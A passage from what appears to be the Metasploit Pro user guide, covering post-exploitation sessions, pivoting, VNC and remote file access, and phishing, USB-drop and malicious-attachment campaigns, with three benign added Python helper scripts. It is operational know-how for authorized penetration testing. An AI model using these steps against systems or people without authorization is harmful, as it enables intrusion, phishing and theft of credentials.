A Meterpreter session enables you to use VNC to gain access to the device and enables you to use a built-in file browser to upload or download sensitive information. Meterpreter shells are currently only available for Windows. Metasploit Pro opens a Meterpreter session when the following events occur:
- Successful exploit on Windows
- SSH bruteforce on Windows
- Telnet bruteforce on Windows
- SMB bruteforce on Windows
- Tomcat bruteforce on Windows

Interacting with Meterpreter Sessions


Before you can interact with a Meterpreter session, you must have an active session on a compromised Windows target.

1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on the active session that you want to open. The session must be a Meterpreter session.

3. Click Virtual Desktop from the Available Actions area.

4. Choose the Java client or choose to manually connect to an external client.

Authentication Notes
Every successful authentication results in an authentication note attached to the host and an entry in the corresponding reports. Some protocols and servers do not allow you to execute commands directly. For example, you can use FTP to bruteforce credentials, but after the attack finds a valid credential, you cannot run commands directly on the server, so the attacker cannot obtain a session. When a case like this occurs during a bruteforce attack or an exploit, an alert appears on the Analysis tab indicating that the system identified a valid account but could not create a session. If the system identifies new credential information for a particular host, you can use the credentials to authenticate to the host outside Metasploit Pro.


Session Tasks
A session task is an action that you can perform within the active session. For example, session tasks enable you to collect evidence, access the file system, run a command shell, and create a pivot through the compromised host.

Session Details
The session details describe information about a particular session, such as the session type and the attack module that Metasploit Pro used to obtain the session. Additionally, when you view the session details for an active session, you can access the actions that are available for that session. The session details for a closed session describe the event history for the session.

Viewing Details for a Session


1. Open a project and click the Sessions tab. The Sessions window appears.

2. Click on an active session name.

3. The session details appear and show the actions that are available for the session.

Proxy Pivot
A proxy pivot sends attacks through the remote host and uses the remote host as a gateway over TCP/UDP. When a proxy pivot is active, discovery scans, bruteforce, and exploitation tasks are sourced from the pivoted host. Note: Metasploit Pro does not support IPv6 addresses for pivoting.

Creating a Proxy Pivot


1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on an active session name.

3. When the session details page appears, click the Create Proxy Pivot button. Metasploit Pro automatically creates a route for the session.

VPN Pivot
A VPN pivot creates a type of VPN tunnel to an exploited Windows host and turns the host into a pivot point for traffic. To create a VPN pivot, Metasploit Pro creates a hook at the kernel level of the target system. The hook does not create an interface on the remote system and acts as a sniffer to return all traffic that Metasploit Pro initiates. When Metasploit Pro creates a VPN Pivot, the VPN Pivot appears as a local interface, which enables you to use IP forwarding and use the interface as a gateway to the target network. However, Metasploit Pro cannot create a bridge to a network that it is already attached to, because doing so creates a conflicting route for the target network. Therefore, you must verify that Metasploit Pro does not have an existing direct connection to any network that has the same IP range and netmask as the target network. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
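As an added pre-flight check that is not part of the guide or of Metasploit Pro, the following Python script parses Linux `ip route show` output for directly attached networks and reports any that overlap the intended VPN pivot target; it rejects IPv6 targets because pivoting does not support them. The sample routing table and target networks are constructed, and treating a route without a `via` gateway as "directly attached" is an assumption of this script.

```python
"""Pre-flight check before creating a VPN pivot: find directly attached local
networks that overlap the target network (added example, not Metasploit Pro code)."""
import ipaddress
from typing import Iterable, List

# Constructed sample of `ip route show` output from the attacking Linux host.
SAMPLE_IP_ROUTE = """\
default via 192.168.1.1 dev eth0 proto dhcp metric 100
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.50 metric 100
10.10.0.0/16 via 192.168.1.254 dev eth0
172.16.5.0/24 dev eth1 proto kernel scope link src 172.16.5.2
"""


def directly_attached_networks(ip_route_output: str) -> List[str]:
    """Return the CIDR prefixes of directly attached (on-link) routes.

    Assumption: a route is "direct" when it has no gateway, i.e. no `via`
    token; default routes and gateway routes are not direct connections.
    """
    attached = []
    for line in ip_route_output.splitlines():
        tokens = line.split()
        if not tokens or tokens[0] == "default" or "via" in tokens:
            continue
        # The first token is the destination prefix; validate it as a network.
        try:
            net = ipaddress.ip_network(tokens[0], strict=False)
        except ValueError:
            continue
        attached.append(str(net))
    return attached


def find_route_conflicts(local_networks: Iterable[str], target_network: str) -> List[str]:
    """Return every local network whose address range overlaps the target.

    A non-empty result means the VPN pivot would create a conflicting route.
    IPv6 targets are rejected because Metasploit Pro does not pivot over IPv6.
    """
    target = ipaddress.ip_network(target_network, strict=False)
    if target.version != 4:
        raise ValueError("VPN pivot targets must be IPv4 networks")
    conflicts = []
    for text in local_networks:
        local = ipaddress.ip_network(text, strict=False)
        # overlaps() is true for identical, containing and contained ranges.
        if local.version == target.version and local.overlaps(target):
            conflicts.append(str(local))
    return conflicts


def vpn_pivot_preflight(ip_route_output: str, target_network: str) -> bool:
    """True when it is safe to bridge to target_network; prints any conflicts."""
    conflicts = find_route_conflicts(directly_attached_networks(ip_route_output), target_network)
    for net in conflicts:
        print(f"conflict: local route {net} overlaps target {target_network}")
    return not conflicts


if __name__ == "__main__":
    print("172.16.0.0/16 safe?", vpn_pivot_preflight(SAMPLE_IP_ROUTE, "172.16.0.0/16"))
    print("10.20.0.0/24 safe?", vpn_pivot_preflight(SAMPLE_IP_ROUTE, "10.20.0.0/24"))
```

On a live host, replace SAMPLE_IP_ROUTE with the captured output of `ip route show` on the machine running Metasploit Pro.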

Virtual Interfaces
In order to provide VPN pivot functionality on the Windows platform, Metasploit Pro must install a new network driver. The driver, msftap.sys, creates four virtual interfaces on the installed system, which provides the ability to run up to four concurrent VPN Pivot sessions. If Metasploit Pro does not locate the virtual interfaces when MetasploitProSvc starts, Metasploit Pro automatically installs the network drivers. To reinstall or uninstall these drivers, you can use one of the batch scripts that are available. You can locate the batch scripts at: $INSTALLROOT\apps\pro\data\drivers\<arch>\. You can use the scripts to disable the VPN Pivot virtual interfaces or restore a previously removed driver.

VNC Sessions
You can use an active Meterpreter session to obtain a VNC session with the compromised system. You can either connect to the remote desktop manually or use the VNC client that is available through Metasploit Pro. The VNC client is a Java applet that you can use to remote desktop to the target system. Before you use the Java applet, install the latest Java for your platform. You can download the latest version of Java at http://www.java.com/en/download/manual.jsp. If you do not want to use the Java applet, you can use an external client, such as VNC Viewer.

Opening a VNC Session


1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on an active session.

3. When the session details page appears, click the Virtual Desktop button to connect to the remote desktop.


4. When the confirmation window appears, click OK to continue.

5. Choose to connect manually or to use the Java applet.

File Systems
For Meterpreter sessions, you can use the Metasploit Pro interface to browse the file system on the compromised system. Additionally, you can upload, download, or delete files.

Accessing the File System


1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on an active session.

3. When the session details page appears, click the Access File System button. A new window appears and displays the remote file system.

Uploading a File to a File System


1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on an active session to open the session details page.

3. When the session details page appears, click the Access File System button. A new window appears and displays the remote file system.

4. Select the directory that you want to upload the file to. You can enter the directory path or navigate through the directory tree and select the directory path that you want to use.

5. Click the Upload button.

6. Browse to the location of the file that you want to upload. After you locate the file, select and open the file.

7. Enter a name for the file. If you do not specify a name, the file uses empty as the name.

8. If you want to run the file after you upload it to the file system, select the Run the file option.

9. Upload the file.

Searching the File System


1. From within a project, click the Sessions tab.

2. When the Sessions window appears, click on an active session.

3. When the session details page appears, click the Search File System button.

4. A new window appears and displays the remote file system. Enter the file name that you want to search for and press Enter.


Chapter 17:

Social Engineering

To learn more about social engineering, read the following topics:


- About Social Engineering on page 336
- Social Engineering Techniques on page 338
- Social Engineering Components on page 341
- Social Engineering Workflow on page 342
- Campaign Dashboard on page 346
- Campaign Management on page 351
- Reusable Campaign Resources on page 372
- USB Key Campaigns on page 383
- Phishing Campaigns on page 387
- Social Engineering Report on page 393

About Social Engineering


Social engineering is a method of attack that typically uses a delivery tool, like e-mail or a USB key, to induce a target to share sensitive information or to perform an action that enables an attacker to compromise the system. You perform social engineering tests to gauge how well the members of an organization adhere to security policies or to identify the security vulnerabilities created by people and processes in an organization.

In Metasploit Pro, you create and run campaigns to perform social engineering attacks. A campaign contains the e-mails, web pages, and portable files that you need to run a social engineering attack against a group of human targets. You can set up campaigns to perform phishing attacks, launch client-side exploits, run Java signed applets, generate executables for USB key drops, and send out e-mails with malicious attachments.

The campaign tracks the number of human targets that fall victim to the attack and presents the results in a social engineering report. You can read the report to review the metrics for the campaign, learn about remediation recommendations, and determine the effectiveness of the campaign. Additionally, the campaign page shows real-time statistics that provide you with a high-level overview of the campaign results. For example, you can view the number of recipients who opened the e-mail or filled out the web form in a phishing campaign.

The data that you gather from a social engineering campaign can help paint a clearer picture of the risks and vulnerabilities that exist in the organization and its security infrastructure. An organization can leverage the test results to improve its security posture and increase security awareness.

Social Engineering for Metasploit 4.4 and Older


If you have campaigns that you created with Metasploit Pro versions 4.4 and earlier, you can still access them to generate reports. However, you cannot run a legacy campaign in Metasploit Pro 4.5 or migrate the campaign content over to the new style of campaigns. To access legacy campaigns, use the following URL: https://<metasploit_instance>:3790/workspaces/<n>/campaigns, where n represents the workspace ID assigned to a project. For example, the default project has a workspace ID of 1, so to access the old campaigns for that project on the local Metasploit instance, use the following URL: https://localhost:3790/workspaces/1/campaigns.

Viewing Legacy Campaigns


1. Log in to your instance of Metasploit Pro.

2. When the Projects page appears, click on a project name to open it.


3. Locate the browser address bar.

4. Append /campaigns to the end of the URL and press Enter. The old campaigns area appears.

Generating a Report for Legacy Campaigns


1. Log in to your instance of Metasploit Pro.

2. When the Projects page appears, find the project that contains the campaign that you want to generate a report for and click on the project name to open it.

3. From the Tasks bar, click the Reports tab.

4. From the Quick Tasks bar, click the Standard Report button.

5. From the Report Type dropdown, select Pre-4.5 Campaigns (Deprecated).

6. Select the report format, sections, and options that you want Metasploit Pro to use for the report.

7. When you are ready to generate the report, click the Generate button. Metasploit Pro takes you to the Tasks log where you can view the progress of the report generation. When the report is ready, the task status will change to completed.

8. To view the report, click on the Reports tab and find the name of the report that Metasploit Pro just generated.

9. Click the View or Download link to access the report.


Social Engineering Techniques


The main goal of social engineering is to entice a victim to perform some illicit action that enables you to either exploit their system or collect information from them. Social engineering typically uses e-mail based attacks that target client-side vulnerabilities, which are exploitable through vectors that only a local user can reach. These attacks usually leverage file format exploits and client-side exploits to target the applications and information stored on a victim's local machine, or phishing scams to gather information from a human target. For example, you can attach a PDF that contains an exploit, like the Cooltype exploit, to an e-mail and send the e-mail to a group of people. When a recipient opens the infected PDF, it can create a session on their machine if it is vulnerable to the Cooltype exploit.

The method that you choose depends on the intent and purpose of the social engineering attack. For example, if you want to see how well an organization handles solicitation e-mails, you can set up a phishing attack. If you want to gauge how well an organization follows security best practices, you can generate a standalone executable file, load it onto a USB key, and perform a USB key drop. Read the following sections for more information on the types of social engineering techniques that Metasploit Pro offers.

Phishing
Phishing is a social engineering technique that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like a financial institution. The e-mail contains a link to open a fake web page that looks nearly identical to the official site. The style, logo, and images may appear exactly as they are on the real website. If the human target fills out the web form, you can collect the information as evidence. To set up a phishing attack in Metasploit Pro, you need to create a campaign that contains the following components:
- E-mail component - Defines the content that you want to send in the e-mail body, and the human targets that you want to receive the phishing attack. Each campaign can only contain one e-mail component.
- Web page component - Defines the web page path, the HTML content, and the redirect URL. The web page that you create must contain a form that a human target can use to submit information.

When you run the campaign, Metasploit Pro creates a web server on your local system to host the web page. When a human target clicks on the tracking link and visits the web page, Metasploit Pro records the visit and any information that the human target submits through the web form.


Client-Side Exploits
A client-side exploit attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. In a client-side exploit, the victim must visit a malicious site in order for the exploit to run. A client-side exploit differs from a traditional exploit because it requires the victim to initiate the connection between their machine and the attacking machine; traditional exploits do not require human interaction. When a human target visits the web page that contains the exploit, and the target's system is vulnerable to it, a session opens on the target's machine and gives you shell access to the target's system. Using the session, you can do things like capture screenshots, collect password files, and pivot to other areas of the network. To set up a file format or client-side exploit in Metasploit Pro, you need to create a campaign that contains the following components:

- E-mail component - Defines the content that you want to send in the e-mail body and the human targets that you want to receive the e-mail. You can provide a link to the web page that serves the exploit.
- Web page component (optional) - Sets the web page component to send a client-side exploit and defines the tracking URL and the HTML content for the web page.

File Format Exploits


File format exploits are attacks that take advantage of a vulnerability in the way that an application processes data in a particular kind of file format, such as PDF, DOC, or JPEG. A file format exploit can run when a human target opens an attachment that contains the exploit. For example, you can attach a malicious Word document that contains an exploit, like MS11-006, to an e-mail. When the human target downloads and views the attachment (in thumbnail view), a session opens on the target's machine and gives you a shell to access their system. To set up an e-mail attachment attack in Metasploit Pro, you need to create a campaign that contains the following components:

- E-mail component - Attaches a file format exploit to the e-mail and defines the content that you want to send in the e-mail body, and the human targets that you want to receive the e-mail.
- Portable file component - Generates a file format exploit that you can store on a USB key.

Java Signed Applets


The Java Signed Applet Social Engineering Code Execution module creates a jar file and signs it. You deliver the Java signed applet to a human target from a web page that contains an applet tag. When a human target visits the web page, the target's Java Virtual Machine asks the human target whether they trust the signed applet. If the human target runs the applet, it creates a session on the victim's machine and gives you full user permissions to their system.


Portable Files
A portable file can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key. When a human target inserts the USB drive and opens the file, a connection is created from the target's machine to the attacking machine. To create a portable file in Metasploit Pro, you need to create a campaign that contains the following component:

- Portable file component - Generates an executable or file format exploit that you can store on a USB key.


Social Engineering Components


A social engineering attack consists of the following components:
- Campaign - A logical grouping of components that you need to perform a social engineering attack.
- Campaign component - A building block for a social engineering campaign. A campaign component can be an e-mail, a web page, or a portable file.
- Template - A reusable shell of HTML boilerplate that is made available across campaigns. Create and use a template to quickly generate web page or e-mail content for a campaign.
- Target list - A list that defines the recipients, and their e-mail addresses, that will receive an e-mail. The campaign sends the social engineering attack to the target list. Use CSV formatting to create a target list. The CSV file must include the following header row: email_address, first_name, last_name.
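As an added example that is not part of the guide or of Metasploit Pro, this Python script validates a target list against the required CSV header row (column count, e-mail syntax and duplicate recipients) and builds a well-formed list from a set of recipients. The sample lists, recipient names and addresses are constructed.

```python
"""Validate and build a social engineering target list in the CSV format the
guide requires (added example, not Metasploit Pro code)."""
import csv
import io
import re
from typing import Iterable, List, Tuple

REQUIRED_HEADER = ["email_address", "first_name", "last_name"]
# Deliberately simple address check: one @, no whitespace, a dot in the domain.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed sample target lists: one valid, one with typical mistakes.
GOOD_CSV = """email_address,first_name,last_name
alice@example.com,Alice,Smith
bob@example.com,Bob,Jones
"""

BAD_CSV = """Email,first_name,last_name
alice@example.com,Alice,Smith
not-an-address,Carol,Lee
alice@example.com,Alice,Smith
dave@example.com,Dave
"""


def validate_target_list(csv_text: str) -> Tuple[bool, List[str]]:
    """Check a target list; return (is_valid, list of human-readable errors)."""
    rows = list(csv.reader(io.StringIO(csv_text)))
    if not rows:
        return False, ["target list is empty"]
    errors = []
    header = [cell.strip() for cell in rows[0]]
    if header != REQUIRED_HEADER:
        errors.append(f"header must be {','.join(REQUIRED_HEADER)!r}, got {','.join(header)!r}")
    seen = set()
    # Line numbers are reported as they appear in the file (header is line 1).
    for lineno, row in enumerate(rows[1:], start=2):
        if not any(cell.strip() for cell in row):
            continue  # ignore blank lines
        if len(row) != len(REQUIRED_HEADER):
            errors.append(f"line {lineno}: expected {len(REQUIRED_HEADER)} columns, got {len(row)}")
            continue
        email = row[0].strip()
        if not EMAIL_RE.match(email):
            errors.append(f"line {lineno}: invalid e-mail address {email!r}")
        elif email.lower() in seen:
            # A duplicate would send the same recipient the e-mail twice.
            errors.append(f"line {lineno}: duplicate e-mail address {email!r}")
        else:
            seen.add(email.lower())
    return not errors, errors


def build_target_list(targets: Iterable[Tuple[str, str, str]]) -> str:
    """Produce CSV text with the required header from (email, first, last) tuples."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(REQUIRED_HEADER)
    for email, first, last in targets:
        writer.writerow([email.strip(), first.strip(), last.strip()])
    return buf.getvalue()


if __name__ == "__main__":
    for name, text in (("GOOD_CSV", GOOD_CSV), ("BAD_CSV", BAD_CSV)):
        ok, problems = validate_target_list(text)
        print(name, "valid" if ok else "invalid")
        for problem in problems:
            print("  ", problem)
```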


Social Engineering Workflow


Use the following general steps to set up a social engineering campaign:

1. Upload or create target lists.

2. Create a campaign.

3. Add a campaign component.

4. Configure the campaign component.

5. Configure any necessary servers.

6. Run the campaign.

7. View the campaign statistics to track the actions of the recipients.

8. Stop the campaign.

9. Generate a social engineering report.


Social Engineering Terminology


Before you can create social engineering campaigns, you should familiarize yourself with the terms used for social engineering.

Browser Autopwn
Browser Autopwn is a module that fingerprints HTTP clients and enables you to automatically exploit them based on their browser type. When you run Browser Autopwn, a web server starts on your local system and hosts a malicious site loaded with browser exploits. When a victim visits the site, the module attempts any applicable exploits against the victim's machine until one successfully compromises the system; if an exploit succeeds, a Meterpreter session starts and enables you to access the victim's machine.

Campaign
A campaign is a logical grouping of the components that you need to perform a social engineering attack. A campaign can contain only one e-mail component, but it can have multiple web pages or portable files.

Click Tracking
Click tracking is a method of client-side testing that counts the human targets that click on a link. To implement click tracking, you set up a web page to which you direct a human target. The web page records each visit and helps an organization measure how susceptible its users are to a real attack.

E-mail Template
An e-mail template contains predefined HTML content that you can insert into an e-mail.

Executable
An executable file runs when a human target opens it. The executable runs a payload that creates a connection from the compromised machine back to the attacking machine.

File Format Exploit


A file format exploit targets a vulnerability in a specific application, such as Microsoft Word or Adobe PDF.


Human Target
A human target is the person who receives the social engineering attack or is part of a campaign.

Phishing Attack
A phishing attack is a form of social engineering that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, such as a bank. Generally, the e-mail contains a link that opens a fake web page that looks nearly identical to the official site. The style, logo, and other images may appear exactly as they do on the real website.

Portable File
A generated executable file that you can attach to an e-mail or save to a USB key. When the victim opens the file, the executable runs the payload, starts a session on the victim's machine, and connects back to your machine.

Resource File
A resource file refers to a web page template, e-mail template, or target list. It is a reusable file that you can use in a campaign. Each project has its own set of resource files. The resource files are not shareable between projects.

Social Engineering
Social engineering is an attack method that uses a delivery mechanism, such as e-mail or a USB key, to either trick a victim into providing sensitive information or compromise their machine by means of an exploit.

Target List
A target list defines the targets that you want to include in the social engineering campaign. You use the target list to specify the recipients that you want to e-mail the social engineering attack.

Tracking GIF
A tracking GIF is a tiny image embedded in the e-mail. When a human target opens the e-mail and the mail client fetches the image from the campaign web server, the campaign records the open and sets a browser cookie. Mail clients that block remote images never fetch the GIF, so the number of opens that a campaign reports is a lower bound.


Tracking Link
A tracking link consists of a URL path to a web page and a tracking string. When a target clicks on the URL, the system sets a cookie to track the visit and any subsequent visits.

Tracking String
A tracking string is a 64-bit string that encodes the target and e-mail IDs. Campaigns use tracking strings to attribute activity on the web page to a specific target.
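As an added illustration of the tracking link and tracking string definitions above (this is not Metasploit Pro's actual encoding, which the guide does not document), the following Python packs a 32-bit target ID and a 32-bit e-mail ID into a 64-bit string, appends it to the campaign web page path as a tracking link, and recovers the IDs on the way back. It also adds a keyed MAC, an assumption beyond the guide: without one, a visitor who notices that the string is just two counters can forge links and pollute another target's statistics. SECRET_KEY and the query parameter names t and s are placeholders.

```python
import base64
import hashlib
import hmac
import struct
from urllib.parse import parse_qs, urlencode, urlparse

# Placeholder key for the example; a real deployment loads a random key from config.
SECRET_KEY = b"example-key-replace-me"


def encode_tracking_string(target_id, email_id):
    """Pack a 32-bit target ID and a 32-bit e-mail ID into 64 bits, URL-safe base64."""
    raw = struct.pack(">II", target_id, email_id)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_tracking_string(token):
    """Inverse of encode_tracking_string; raises ValueError on anything but 64 bits."""
    raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    if len(raw) != 8:
        raise ValueError("tracking string must decode to exactly 64 bits")
    return struct.unpack(">II", raw)


def sign(token):
    """Truncated HMAC over the token so visitors cannot forge or enumerate other tokens."""
    return hmac.new(SECRET_KEY, token.encode("ascii"), hashlib.sha256).hexdigest()[:16]


def make_tracking_link(base_url, path, target_id, email_id):
    """Build the tracking link: campaign web page path plus token and its signature."""
    token = encode_tracking_string(target_id, email_id)
    query = urlencode({"t": token, "s": sign(token)})
    return "%s/%s?%s" % (base_url.rstrip("/"), path.strip("/"), query)


def parse_tracking_link(url):
    """Return (target_id, email_id) when the link is genuine and intact, else None."""
    params = parse_qs(urlparse(url).query)
    token = params.get("t", [""])[0]
    sig = params.get("s", [""])[0]
    if not token or not hmac.compare_digest(sign(token).encode(), sig.encode()):
        return None
    try:
        return decode_tracking_string(token)
    except ValueError:
        return None


if __name__ == "__main__":
    link = make_tracking_link("http://www.mycompany.com", "support", 42, 7)
    print(link)
    print(parse_tracking_link(link))
```

The signature is verified before the token is decoded, so a tampered or guessed tracking string is rejected without ever being attributed to a target.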

Visit
A visit occurs when a target clicks on a link and opens the web page.

Web Template
A web template contains predefined HTML content that you can insert into a web page.


Campaign Dashboard
The Campaign Dashboard contains the interfaces and tools that you need to set up social engineering campaigns. It provides you with access to the campaigns, target lists, and resource files that are in a project. The Campaign Dashboard is made up of the campaign tasks bar, modal windows, campaign widgets, and action links.

Campaign Tasks Bar


When you access the Campaign Dashboard, you will see the Campaign Tasks bar below the main Tasks bar. Each tab in the Campaign Tasks bar represents a major section of functionality within social engineering. Click the tabs to switch between the campaign configuration, campaign management, and campaign elements areas.

The Campaign Tasks bar contains the following tabs:

- Configure a Campaign - Displays the campaign editor. Use the campaign editor to create new campaigns and edit existing campaigns.
- Manage Campaigns - Shows a list of the campaigns that are currently in the project. Next to each campaign listing is a set of action links. Use these action links to edit, delete, reset, preview, and start or stop a campaign.
- Manage Reusable Resources - Provides a management interface for reusable campaign resources, such as e-mail templates, web page templates, target lists, and malicious files.


Campaign Widgets
A campaign widget is an icon that represents a campaign component. When you click on the campaign widget, it opens a modal window that displays the configuration form for that campaign component.

Modal Windows
A modal window is a small pop-up window that requires you to interact with it before you can go back to the main window. Typically, modal windows are used to display alerts and confirmations. In Metasploit Pro, modal windows guide you through the process of setting up campaign components. To exit a modal window, either complete the required form data or click the X to close it.

Action Links
An action link is an interactive link that you click to perform a specific task. The following action links are available for each campaign:

- Start - Launch the campaign.
- Stop - Stop the campaign.
- Preview - Generate a preview of an e-mail and web page.
- Reset - Reset the statistics and data in a campaign.
- Edit - Edit the current configuration for campaign components.
- Delete - Remove the campaign and its data from the project.

The following image shows the action links that are available for a campaign:


Campaigns
A campaign is a logical grouping of the campaign components that you need to exploit or phish a group of people. A campaign can be comprised of the following campaign components: e-mail, web page, or portable file. The components that you add to the campaign depend on the purpose and goal of the social engineering attack.

Campaign Restrictions
The following restrictions apply to campaigns:

- A campaign can contain only one e-mail.
- A campaign that you build with the canned phishing campaign can contain only one e-mail and up to two web pages. One web page is used for the landing page, and the other is used for the redirect page. If you need additional redirect pages, do not use the canned phishing campaign; use the custom campaign builder instead.
- Each instance of Metasploit Pro can run only one campaign at a time.
- Metasploit Pro does not serve images or asset files locally. If you manually create a web page, you must define fully qualified URLs for them.

Campaign States
A campaign state describes the current status of a campaign. At any given point in time, a campaign is in one of the following states:

- Unconfigured - The campaign does not contain any components.
- Preparing - The campaign is getting ready to run.
- Launchable - The campaign is ready to start.
- Running - The campaign is online. For campaigns that have a web page, this means that the web page is online and accessible to target machines that can reach the Metasploit instance. For campaigns that contain an e-mail, this means that Metasploit Pro has attempted to send the e-mail to the target list through your mail server. For campaigns that contain portable files, this means that the handler is ready and waiting for incoming connections from target machines.
- Finished - The campaign is no longer active. For campaigns that have a web page, this means that the web page is no longer accessible and cannot be viewed by anyone. For campaigns that contain portable files, this means that the handler is no longer listening for incoming connections.


Campaign Management
A campaign is a grouping of components that you need to set up a social engineering attack. You create campaigns to configure and manage campaign components, such as e-mails, web pages, and portable files.

Creating a Campaign
1. From within a project, select Campaigns from the Tasks menu. The Manage Campaigns area appears.
2. Click the Configure a Campaign tab.
3. When the Configure a Campaign area appears, enter a name for the campaign in the Name field.
4. Choose one of the following setup options:

- Phishing Campaign - Metasploit Pro automatically creates a campaign that has the campaign components needed for a phishing attack. The canned phishing campaign contains an e-mail component and two web page components, which you configure as the landing page and the redirect page.
- Custom Campaign - You manually create the campaign and add the campaign components that you need. A custom campaign can contain any combination of campaign components.

Now you're ready to customize the campaign. If the campaign is empty, you need to add a component to it. For example, if you want to generate an executable to save to a USB key, add a portable file component.

Editing the Campaign Name


1. From within a project, select Campaigns from the Tasks menu.
2. When the Manage Campaigns area appears, find the campaign that you want to edit.
3. Click the Edit link.
4. When the campaign configuration page appears, delete the existing campaign name from the Name field.
5. Enter the new campaign name in the Name field.
6. Click the Save button.


Running a Campaign
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to run. The campaign status must be Launchable for the campaign to run. A Launchable status indicates that all necessary components of the campaign are configured.
3. Click the Start link.

Clearing the Data from a Campaign


When you reset a campaign, you clear all the statistics and data collected by the campaign. A campaign reset removes any data collected through form submissions, the statistics for a phishing attack, and the statistics for e-mail tracking.

1. From within a project, select Campaigns from the Tasks menu.
2. When the Manage Campaigns area appears, find the campaign that you want to reset.
3. Click the Reset link.
4. When the confirmation window appears, click OK to confirm that you want to reset the data in the campaign.

Viewing the Findings for a Campaign


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign whose results you want to view.
3. Click the Findings link. The Findings window appears and displays the statistics for the entire campaign. You will see the total number of human targets that received an e-mail, opened the e-mail, visited the phishing web page, and submitted the web page form.
4. Click on a stat bubble to view the list of human targets associated with that statistic. For example, if you view the findings for the recipients who filled out the web form, you will see the name and e-mail address of each human target that submitted the form. If you click on their e-mail address, you will see the data that they submitted.
5. Click the Done button to close the Findings window.

Adding a Campaign Component


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to edit and click the Edit link.
3. When the campaign configuration page appears, click the Add e-mail, web page, or portable file button. You can only add components to a campaign that uses the custom setup. You cannot add components to a campaign that you created with the canned phishing campaign.
4. Click on the campaign component that you want to add. After you add the component, the configuration page for the component appears. Follow the onscreen instructions to configure the component.

Removing a Campaign Component


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to edit and click the Edit link.
3. When the campaign configuration page appears, click the Edit button located under Campaign Components. The component icons show red Xs that you can use to remove a component from the campaign.
4. Click the X button for the component that you want to remove.
5. Click the Done button when you finish.

Stopping a Campaign
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to stop.
3. Click the Stop link.


Sending an E-mail Notification when a Campaign Starts


Before you configure an e-mail notification, verify that the SMTP settings for your mail server have been configured for Metasploit Pro. Go to Administration > Global Settings to view your SMTP settings.

1. From the campaign configuration form, locate the Notifications area.
2. Select the Notify others before launching the campaign option.
3. When the Notification Settings window appears, enter the e-mail addresses of the people you want to alert in the To field. To include multiple e-mail addresses, use a comma-separated list, for example: joe@rapid7.com, mary@rapid7.com, jon@rapid7.com.
4. In the Subject field, enter the subject that you want the e-mail to display. By default, Metasploit Pro fills in a canned subject line for you.
5. In the Message field, enter the body of the e-mail. For example: "This is a company-wide alert to inform you that we are starting our security awareness program. If you have any questions, please contact John Smith."
6. When you are done creating the notification e-mail, click the Save button.

Uploading a Malicious File


1. From within a project, click the Campaigns tab.
2. Click the Manage Reusable Resources tab.
3. From the Resource dropdown, select Malicious Files.
4. Click the New Malicious File button.
5. In the File name field, enter the name of the file that you are importing. The file name must include the file extension. For example, if you are uploading an executable file, the file name should include the .exe extension.
6. Click the Browse button to navigate to the location of the file that you want to upload. Once you have found and selected the file, click the Open button. The path to the file appears in the Attachment field.
7. Click the Save button.

Deleting a Campaign
1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to delete.
3. Click the Delete button.
4. When the confirmation window appears, click OK to confirm that you want to permanently delete the campaign. All target lists and campaign components will be deleted from the project. You will no longer be able to view, run, or edit the campaign.

Exporting a CSV File of Campaign Findings


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export.
3. Click the Findings link.
4. Click on the stat bubble that represents the data that you want to export. For example, if you want to export the list of human targets that opened the e-mail, click on the n% recipients opened the e-mail stat bubble. A list of human targets and the Export Data button appears.
5. Click the Export Data button.
6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.

Exporting a CSV File of E-mail Sent from a Campaign


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export.
3. Click the Findings link.
4. Click on the #n e-mails were sent stat bubble. A list of human targets and the Export Data button appears.
5. Click the Export Data button.
6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.

Exporting a CSV File of Human Targets that Opened the E-mail


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export.
3. Click the Findings link.
4. Click on the %n of recipients opened the e-mail stat bubble. A list of human targets and the Export Data button appears.
5. Click the Export Data button.
6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.

Exporting a CSV File of Human Targets that Clicked on the Link


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export.
3. Click the Findings link.
4. Click on the %n of openers clicked on link stat bubble. A list of human targets and the Export Data button appears.
5. Click the Export Data button.
6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.

Exporting a CSV File of Human Targets that Submitted the Form


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export.
3. Click the Findings link.
4. Click on the %n of openers submitted the form stat bubble. A list of human targets and the Export Data button appears.
5. Click the Export Data button.
6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.


Campaign Components
